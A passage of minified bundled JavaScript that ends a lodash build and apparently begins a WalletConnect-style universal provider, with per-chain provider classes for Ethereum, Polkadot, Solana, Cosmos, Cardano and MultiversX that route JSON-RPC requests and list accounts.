            return a.after = Xl, a.ary = Ju, a.assign = $p, a.assignIn = oa, a.assignInWith = ar, a.assignWith = Up, a.at = Wp, a.before = Xu, a.bind = Ci, a.bindAll = Gd, a.bindKey = Qu, a.castArray = ap, a.chain = Ku, a.chunk = vh, a.compact = _h, a.concat = mh, a.cond = zd, a.conforms = Kd, a.constant = Ri, a.countBy = yl, a.create = Fp, a.curry = Vu, a.curryRight = ku, a.debounce = ju, a.defaults = Mp, a.defaultsDeep = qp, a.defer = Ql, a.delay = Vl, a.difference = wh, a.differenceBy = Ph, a.differenceWith = Ah, a.drop = Ch, a.dropRight = Ih, a.dropRightWhile = xh, a.dropWhile = Eh, a.fill = yh, a.filter = Ol, a.flatMap = Tl, a.flatMapDeep = Ll, a.flatMapDepth = Dl, a.flatten = qu, a.flattenDeep = Sh, a.flattenDepth = Oh, a.flip = kl, a.flow = Zd, a.flowRight = Jd, a.fromPairs = Rh, a.functions = Jp, a.functionsIn = Xp, a.groupBy = Nl, a.initial = Th, a.intersection = Lh, a.intersectionBy = Dh, a.intersectionWith = Nh, a.invert = Vp, a.invertBy = kp, a.invokeMap = $l, a.iteratee = bi, a.keyBy = Ul, a.keys = V, a.keysIn = on, a.map = tr, a.mapKeys = nd, a.mapValues = td, a.matches = Xd, a.matchesProperty = Qd, a.memoize = rr, a.merge = ed, a.mergeWith = fa, a.method = Vd, a.methodOf = kd, a.mixin = Ti, a.negate = ir, a.nthArg = ng, a.omit = rd, a.omitBy = id, a.once = jl, a.orderBy = Wl, a.over = tg, a.overArgs = np, a.overEvery = eg, a.overSome = rg, a.partial = Ii, a.partialRight = na, a.partition = Fl, a.pick = sd, a.pickBy = ca, a.property = _a, a.propertyOf = ig, a.pull = Wh, a.pullAll = Gu, a.pullAllBy = Fh, a.pullAllWith = Mh, a.pullAt = qh, a.range = sg, a.rangeRight = ug, a.rearg = tp, a.reject = Bl, a.remove = Bh, a.rest = ep, a.reverse = Pi, a.sampleSize = zl, a.set = ad, a.setWith = od, a.shuffle = Kl, a.slice = Gh, a.sortBy = Jl, a.sortedUniq = Qh, a.sortedUniqBy = Vh, a.split = Td, a.spread = rp, a.tail = kh, a.take = jh, a.takeRight = nl, a.takeRightWhile = tl, a.takeWhile = el, a.tap = _l, a.throttle = ip, a.thru = nr, a.toArray = sa, a.toPairs = ha, a.toPairsIn = la, a.toPath = hg, a.toPlainObject = aa, a.transform = fd, a.unary = sp, a.union = rl, a.unionBy = il, a.unionWith = sl, a.uniq = ul, a.uniqBy = al, a.uniqWith = ol, a.unset = cd, a.unzip = Ai, a.unzipWith = zu, a.update = hd, a.updateWith = ld, a.values = qt, a.valuesIn = pd, a.without = fl, a.words = ga, a.wrap = up, a.xor = cl, a.xorBy = hl, a.xorWith = ll, a.zip = pl, a.zipObject = dl, a.zipObjectDeep = gl, a.zipWith = vl, a.entries = ha, a.entriesIn = la, a.extend = oa, a.extendWith = ar, Ti(a, a), a.add = pg, a.attempt = va, a.camelCase = _d, a.capitalize = pa, a.ceil = dg, a.clamp = dd, a.clone = op, a.cloneDeep = cp, a.cloneDeepWith = hp, a.cloneWith = fp, a.conformsTo = lp, a.deburr = da, a.defaultTo = Yd, a.divide = gg, a.endsWith = md, a.eq = bn, a.escape = wd, a.escapeRegExp = Pd, a.every = Sl, a.find = Rl, a.findIndex = Fu, a.findKey = Bp, a.findLast = bl, a.findLastIndex = Mu, a.findLastKey = Gp, a.floor = vg, a.forEach = Yu, a.forEachRight = Zu, a.forIn = zp, a.forInRight = Kp, a.forOwn = Yp, a.forOwnRight = Zp, a.get = yi, a.gt = pp, a.gte = dp, a.has = Qp, a.hasIn = Si, a.head = Bu, a.identity = fn, a.includes = Hl, a.indexOf = bh, a.inRange = gd, a.invoke = jp, a.isArguments = wt, a.isArray = O, a.isArrayBuffer = gp, a.isArrayLike = an, a.isArrayLikeObject = Y, a.isBoolean = vp, a.isBuffer = at, a.isDate = _p, a.isElement = mp, a.isEmpty = wp, a.isEqual = Pp, a.isEqualWith = Ap, a.isError = xi, a.isFinite = Cp, a.isFunction = Xn, a.isInteger = ta, a.isLength = sr, a.isMap = ea, a.isMatch = Ip, a.isMatchWith = xp, a.isNaN = Ep, a.isNative = yp, a.isNil = Op, a.isNull = Sp, a.isNumber = ra, a.isObject = z, a.isObjectLike = K, a.isPlainObject = le, a.isRegExp = Ei, a.isSafeInteger = Rp, a.isSet = ia, a.isString = ur, a.isSymbol = pn, a.isTypedArray = Mt, a.isUndefined = bp, a.isWeakMap = Tp, a.isWeakSet = Lp, a.join = Hh, a.kebabCase = Ad, a.last = In, a.lastIndexOf = $h, a.lowerCase = Cd, a.lowerFirst = Id, a.lt = Dp, a.lte = Np, a.max = _g, a.maxBy = mg, a.mean = wg, a.meanBy = Pg, a.min = Ag, a.minBy = Cg, a.stubArray = Di, a.stubFalse = Ni, a.stubObject = ag, a.stubString = og, a.stubTrue = fg, a.multiply = Ig, a.nth = Uh, a.noConflict = jd, a.noop = Li, a.now = er, a.pad = xd, a.padEnd = Ed, a.padStart = yd, a.parseInt = Sd, a.random = vd, a.reduce = Ml, a.reduceRight = ql, a.repeat = Od, a.replace = Rd, a.result = ud, a.round = xg, a.runInContext = h, a.sample = Gl, a.size = Yl, a.snakeCase = bd, a.some = Zl, a.sortedIndex = zh, a.sortedIndexBy = Kh, a.sortedIndexOf = Yh, a.sortedLastIndex = Zh, a.sortedLastIndexBy = Jh, a.sortedLastIndexOf = Xh, a.startCase = Ld, a.startsWith = Dd, a.subtract = Eg, a.sum = yg, a.sumBy = Sg, a.template = Nd, a.times = cg, a.toFinite = Qn, a.toInteger = R, a.toLength = ua, a.toLower = Hd, a.toNumber = xn, a.toSafeInteger = Hp, a.toString = U, a.toUpper = $d, a.trim = Ud, a.trimEnd = Wd, a.trimStart = Fd, a.truncate = Md, a.unescape = qd, a.uniqueId = lg, a.upperCase = Bd, a.upperFirst = Oi, a.each = Yu, a.eachRight = Zu, a.first = Bu, Ti(a, function() {
                var n = {};
                return $n(a, function(t, e) {
                    W.call(a.prototype, e) || (n[e] = t);
                }), n;
            }(), {
                chain: !1
            }), a.VERSION = p, mn([
                "bind",
                "bindKey",
                "curry",
                "curryRight",
                "partial",
                "partialRight"
            ], function(n) {
                a[n].placeholder = a;
            }), mn([
                "drop",
                "take"
            ], function(n, t) {
                N.prototype[n] = function(e) {
                    e = e === i ? 1 : Q(R(e), 0);
                    var r = this.__filtered__ && !t ? new N(this) : this.clone();
                    return r.__filtered__ ? r.__takeCount__ = nn(e, r.__takeCount__) : r.__views__.push({
                        size: nn(e, Hn),
                        type: n + (r.__dir__ < 0 ? "Right" : "")
                    }), r;
                }, N.prototype[n + "Right"] = function(e) {
                    return this.reverse()[n](e).reverse();
                };
            }), mn([
                "filter",
                "map",
                "takeWhile"
            ], function(n, t) {
                var e = t + 1, r = e == qi || e == $a;
                N.prototype[n] = function(s) {
                    var o = this.clone();
                    return o.__iteratees__.push({
                        iteratee: x(s, 3),
                        type: e
                    }), o.__filtered__ = o.__filtered__ || r, o;
                };
            }), mn([
                "head",
                "last"
            ], function(n, t) {
                var e = "take" + (t ? "Right" : "");
                N.prototype[n] = function() {
                    return this[e](1).value()[0];
                };
            }), mn([
                "initial",
                "tail"
            ], function(n, t) {
                var e = "drop" + (t ? "" : "Right");
                N.prototype[n] = function() {
                    return this.__filtered__ ? new N(this) : this[e](1);
                };
            }), N.prototype.compact = function() {
                return this.filter(fn);
            }, N.prototype.find = function(n) {
                return this.filter(n).head();
            }, N.prototype.findLast = function(n) {
                return this.reverse().find(n);
            }, N.prototype.invokeMap = T(function(n, t) {
                return typeof n == "function" ? new N(this) : this.map(function(e) {
                    return ue(e, n, t);
                });
            }), N.prototype.reject = function(n) {
                return this.filter(ir(x(n)));
            }, N.prototype.slice = function(n, t) {
                n = R(n);
                var e = this;
                return e.__filtered__ && (n > 0 || t < 0) ? new N(e) : (n < 0 ? e = e.takeRight(-n) : n && (e = e.drop(n)), t !== i && (t = R(t), e = t < 0 ? e.dropRight(-t) : e.take(t - n)), e);
            }, N.prototype.takeRightWhile = function(n) {
                return this.reverse().takeWhile(n).reverse();
            }, N.prototype.toArray = function() {
                return this.take(Hn);
            }, $n(N.prototype, function(n, t) {
                var e = /^(?:filter|find|map|reject)|While$/.test(t), r = /^(?:head|last)$/.test(t), s = a[r ? "take" + (t == "last" ? "Right" : "") : t], o = r || /^find/.test(t);
                s && (a.prototype[t] = function() {
                    var f = this.__wrapped__, c = r ? [
                        1
                    ] : arguments, l = f instanceof N, v = c[0], _ = l || O(f), m = function(L) {
                        var H = s.apply(a, nt([
                            L
                        ], c));
                        return r && w ? H[0] : H;
                    };
                    _ && e && typeof v == "function" && v.length != 1 && (l = _ = !1);
                    var w = this.__chain__, A = !!this.__actions__.length, E = o && !w, b = l && !A;
                    if (!o && _) {
                        f = b ? f : new N(this);
                        var y = n.apply(f, c);
                        return y.__actions__.push({
                            func: nr,
                            args: [
                                m
                            ],
                            thisArg: i
                        }), new Pn(y, w);
                    }
                    return E && b ? n.apply(this, c) : (y = this.thru(m), E ? r ? y.value()[0] : y.value() : y);
                });
            }), mn([
                "pop",
                "push",
                "shift",
                "sort",
                "splice",
                "unshift"
            ], function(n) {
                var t = ye[n], e = /^(?:push|sort|unshift)$/.test(n) ? "tap" : "thru", r = /^(?:pop|shift)$/.test(n);
                a.prototype[n] = function() {
                    var s = arguments;
                    if (r && !this.__chain__) {
                        var o = this.value();
                        return t.apply(O(o) ? o : [], s);
                    }
                    return this[e](function(f) {
                        return t.apply(O(f) ? f : [], s);
                    });
                };
            }), $n(N.prototype, function(n, t) {
                var e = a[t];
                if (e) {
                    var r = e.name + "";
                    W.call(Ht, r) || (Ht[r] = []), Ht[r].push({
                        name: t,
                        func: e
                    });
                }
            }), Ht[Ze(i, ft).name] = [
                {
                    name: "wrapper",
                    func: i
                }
            ], N.prototype.clone = qf, N.prototype.reverse = Bf, N.prototype.value = Gf, a.prototype.at = ml, a.prototype.chain = wl, a.prototype.commit = Pl, a.prototype.next = Al, a.prototype.plant = Il, a.prototype.reverse = xl, a.prototype.toJSON = a.prototype.valueOf = a.prototype.value = El, a.prototype.first = a.prototype.head, jt && (a.prototype[jt] = Cl), a;
        }, Lt = Pf();
        ht ? ((ht.exports = Lt)._ = Lt, br._ = Lt) : k._ = Lt;
    }).call($253fb4de41dc743b$var$pe);
})($253fb4de41dc743b$var$$i, $253fb4de41dc743b$var$$i.exports);
var $253fb4de41dc743b$var$Fg = Object.defineProperty, $253fb4de41dc743b$var$Mg = Object.defineProperties, $253fb4de41dc743b$var$qg = Object.getOwnPropertyDescriptors, $253fb4de41dc743b$var$xa = Object.getOwnPropertySymbols, $253fb4de41dc743b$var$Bg = Object.prototype.hasOwnProperty, $253fb4de41dc743b$var$Gg = Object.prototype.propertyIsEnumerable, $253fb4de41dc743b$var$Ea = (C, u, i)=>u in C ? $253fb4de41dc743b$var$Fg(C, u, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: i
    }) : C[u] = i, $253fb4de41dc743b$var$fr = (C, u)=>{
    for(var i in u || (u = {}))$253fb4de41dc743b$var$Bg.call(u, i) && $253fb4de41dc743b$var$Ea(C, i, u[i]);
    if ($253fb4de41dc743b$var$xa) for (var i of $253fb4de41dc743b$var$xa(u))$253fb4de41dc743b$var$Gg.call(u, i) && $253fb4de41dc743b$var$Ea(C, i, u[i]);
    return C;
}, $253fb4de41dc743b$var$zg = (C, u)=>$253fb4de41dc743b$var$Mg(C, $253fb4de41dc743b$var$qg(u));
function $253fb4de41dc743b$var$En(C, u, i) {
    let p;
    const I = $253fb4de41dc743b$var$Ui(C);
    return u.rpcMap && (p = u.rpcMap[I]), p || (p = `${$253fb4de41dc743b$var$Wg}?chainId=eip155:${I}&projectId=${i}`), p;
}
function $253fb4de41dc743b$var$Ui(C) {
    return C.includes("eip155") ? Number(C.split(":")[1]) : Number(C);
}
function $253fb4de41dc743b$var$ya(C) {
    return C.map((u)=>`${u.split(":")[0]}:${u.split(":")[1]}`);
}
function $253fb4de41dc743b$var$Kg(C, u) {
    const i = Object.keys(u.namespaces).filter((I)=>I.includes(C));
    if (!i.length) return [];
    const p = [];
    return i.forEach((I)=>{
        const D = u.namespaces[I].accounts;
        p.push(...D);
    }), p;
}
function $253fb4de41dc743b$var$Yg(C = {}, u = {}) {
    const i = $253fb4de41dc743b$var$Sa(C), p = $253fb4de41dc743b$var$Sa(u);
    return $253fb4de41dc743b$var$$i.exports.merge(i, p);
}
function $253fb4de41dc743b$var$Sa(C) {
    var u, i, p, I;
    const D = {};
    if (!(0, $a5d33cfc7f8e5437$export$16a0268bc22b47b0)(C)) return D;
    for (const [F, Fn] of Object.entries(C)){
        const Gt = (0, $a5d33cfc7f8e5437$export$e03e993df4723bde)(F) ? [
            F
        ] : Fn.chains, lr = Fn.methods || [], At = Fn.events || [], Ln = Fn.rpcMap || {}, Mn = (0, $a5d33cfc7f8e5437$export$dd404c96fbbb1ff8)(F);
        D[Mn] = $253fb4de41dc743b$var$zg($253fb4de41dc743b$var$fr($253fb4de41dc743b$var$fr({}, D[Mn]), Fn), {
            chains: (0, $a5d33cfc7f8e5437$export$9826fe7ad3921016)(Gt, (u = D[Mn]) == null ? void 0 : u.chains),
            methods: (0, $a5d33cfc7f8e5437$export$9826fe7ad3921016)(lr, (i = D[Mn]) == null ? void 0 : i.methods),
            events: (0, $a5d33cfc7f8e5437$export$9826fe7ad3921016)(At, (p = D[Mn]) == null ? void 0 : p.events),
            rpcMap: $253fb4de41dc743b$var$fr($253fb4de41dc743b$var$fr({}, Ln), (I = D[Mn]) == null ? void 0 : I.rpcMap)
        });
    }
    return D;
}
function $253fb4de41dc743b$var$Zg(C) {
    return C.includes(":") ? C.split(":")[2] : C;
}
function $253fb4de41dc743b$var$Jg(C) {
    const u = {};
    for (const [i, p] of Object.entries(C)){
        const I = p.methods || [], D = p.events || [], F = p.accounts || [], Fn = (0, $a5d33cfc7f8e5437$export$e03e993df4723bde)(i) ? [
            i
        ] : p.chains ? p.chains : $253fb4de41dc743b$var$ya(p.accounts);
        u[i] = {
            chains: Fn,
            methods: I,
            events: D,
            accounts: F
        };
    }
    return u;
}
const $253fb4de41dc743b$var$Oa = {}, $253fb4de41dc743b$var$J = (C)=>$253fb4de41dc743b$var$Oa[C], $253fb4de41dc743b$var$Wi = (C, u)=>{
    $253fb4de41dc743b$var$Oa[C] = u;
};
class $253fb4de41dc743b$var$Xg {
    constructor(u){
        this.name = "polkadot", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (this.chainId = u, !this.httpProviders[u]) {
            const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]) || [] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            u[i] = this.createHttpProvider(i, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(u, this.namespace);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
class $253fb4de41dc743b$var$Qg {
    constructor(u){
        this.name = "eip155", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.httpProviders = this.createHttpProviders(), this.chainId = parseInt(this.getDefaultChain());
    }
    async request(u) {
        switch(u.request.method){
            case "eth_requestAccounts":
                return this.getAccounts();
            case "eth_accounts":
                return this.getAccounts();
            case "wallet_switchEthereumChain":
                return await this.handleSwitchChain(u);
            case "eth_chainId":
                return parseInt(this.getDefaultChain());
        }
        return this.namespace.methods.includes(u.request.method) ? await this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    setDefaultChain(u, i) {
        const p = $253fb4de41dc743b$var$Ui(u);
        if (!this.httpProviders[p]) {
            const I = i || $253fb4de41dc743b$var$En(`${this.name}:${p}`, this.namespace, this.client.core.projectId);
            if (!I) throw new Error(`No RPC url provided for chainId: ${p}`);
            this.setHttpProvider(p, I);
        }
        this.chainId = p, this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${p}`);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId.toString();
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace, this.client.core.projectId);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $da1642b2b5d2a2fb$export$13c1f9cf8a283575)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            const I = $253fb4de41dc743b$var$Ui(i);
            u[I] = this.createHttpProvider(I, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    getHttpProvider() {
        const u = this.chainId, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    async handleSwitchChain(u) {
        var i, p;
        let I = u.request.params ? (i = u.request.params[0]) == null ? void 0 : i.chainId : "0x0";
        I = I.startsWith("0x") ? I : `0x${I}`;
        const D = parseInt(I, 16);
        if (this.isChainApproved(D)) this.setDefaultChain(`${D}`);
        else if (this.namespace.methods.includes("wallet_switchEthereumChain")) await this.client.request({
            topic: u.topic,
            request: {
                method: u.request.method,
                params: [
                    {
                        chainId: I
                    }
                ]
            },
            chainId: (p = this.namespace.chains) == null ? void 0 : p[0]
        }), this.setDefaultChain(`${D}`);
        else throw new Error(`Failed to switch to chain 'eip155:${D}'. The chain is not approved or the wallet does not support 'wallet_switchEthereumChain' method.`);
        return null;
    }
    isChainApproved(u) {
        return this.namespace.chains.includes(`${this.name}:${u}`);
    }
}
class $253fb4de41dc743b$var$Vg {
    constructor(u){
        this.name = "solana", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (!this.httpProviders[u]) {
            const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace, this.client.core.projectId);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.chainId = u, this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            u[i] = this.createHttpProvider(i, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(u, this.namespace, this.client.core.projectId);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
class $253fb4de41dc743b$var$kg {
    constructor(u){
        this.name = "cosmos", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (this.chainId = u, !this.httpProviders[u]) {
            const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace, this.client.core.projectId);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            u[i] = this.createHttpProvider(i, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(u, this.namespace, this.client.core.projectId);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
class $253fb4de41dc743b$var$jg {
    constructor(u){
        this.name = "cip34", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (this.chainId = u, !this.httpProviders[u]) {
            const p = i || this.getCardanoRPCUrl(u);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            const p = this.getCardanoRPCUrl(i);
            u[i] = this.createHttpProvider(i, p);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    getCardanoRPCUrl(u) {
        const i = this.namespace.rpcMap;
        if (i) return i[u];
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || this.getCardanoRPCUrl(u);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
class $253fb4de41dc743b$var$nv {
    constructor(u){
        this.name = "elrond", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (!this.httpProviders[u]) {
            const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace, this.client.core.projectId);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.chainId = u, this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
            u[i] = this.createHttpProvider(i, (p = this.namespace.rpcMap) == null ? void 0 : p[i]);
        }), u;
    }
    getHttpProvider() {
        const u = `${this.name}:${this.chainId}`, i = this.httpProviders[u];
        if (typeof i > "u") throw new Error(`JSON-RPC provider for ${u} not found`);
        return i;
    }
    setHttpProvider(u, i) {
        const p = this.createHttpProvider(u, i);
        p && (this.httpProviders[u] = p);
    }
    createHttpProvider(u, i) {
        const p = i || $253fb4de41dc743b$var$En(u, this.namespace, this.client.core.projectId);
        return typeof p > "u" ? void 0 : new (0, $1582203255a670cd$export$da28308012bf6748)(new (0, $9fa154a0253fc04e$export$2e2bcd8739ae039)(p, $253fb4de41dc743b$var$J("disableProviderPing")));
    }
}
class $253fb4de41dc743b$var$tv {
    constructor(u){
        this.name = "multiversx", this.namespace = u.namespace, this.events = $253fb4de41dc743b$var$J("events"), this.client = $253fb4de41dc743b$var$J("client"), this.chainId = this.getDefaultChain(), this.httpProviders = this.createHttpProviders();
    }
    updateNamespace(u) {
        this.namespace = Object.assign(this.namespace, u);
    }
    requestAccounts() {
        return this.getAccounts();
    }
    request(u) {
        return this.namespace.methods.includes(u.request.method) ? this.client.request(u) : this.getHttpProvider().request(u.request);
    }
    setDefaultChain(u, i) {
        if (!this.httpProviders[u]) {
            const p = i || $253fb4de41dc743b$var$En(`${this.name}:${u}`, this.namespace, this.client.core.projectId);
            if (!p) throw new Error(`No RPC url provided for chainId: ${u}`);
            this.setHttpProvider(u, p);
        }
        this.chainId = u, this.events.emit($253fb4de41dc743b$var$ot.DEFAULT_CHAIN_CHANGED, `${this.name}:${this.chainId}`);
    }
    getDefaultChain() {
        if (this.chainId) return this.chainId;
        if (this.namespace.defaultChain) return this.namespace.defaultChain;
        const u = this.namespace.chains[0];
        if (!u) throw new Error("ChainId not found");
        return u.split(":")[1];
    }
    getAccounts() {
        const u = this.namespace.accounts;
        return u ? [
            ...new Set(u.filter((i)=>i.split(":")[1] === this.chainId.toString()).map((i)=>i.split(":")[2]))
        ] : [];
    }
    createHttpProviders() {
        const u = {};
        return this.namespace.chains.forEach((i)=>{
            var p;
